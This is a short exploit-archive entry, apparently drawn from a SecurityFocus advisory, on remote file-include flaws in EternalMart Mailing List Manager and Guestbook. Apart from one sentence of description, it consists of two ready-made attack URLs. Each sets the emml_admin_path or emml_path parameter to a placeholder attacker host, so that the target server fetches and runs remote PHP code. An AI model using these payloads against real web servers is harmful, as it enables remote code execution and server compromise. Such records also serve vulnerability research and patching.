11 lines
No EOL
474 B
Text
11 lines
No EOL
474 B
Text
source: https://www.securityfocus.com/bid/8767/info
|
|
|
|
EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver.
|
|
|
|
http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
|
|
include the file :
|
|
http://[attacker]/auth_func.php
|
|
|
|
http://[target]/emml_email_func.php?emml_path=http://[attacker] will
|
|
include the file :
|
|
http://[attacker]/class.html.mime.mail.php |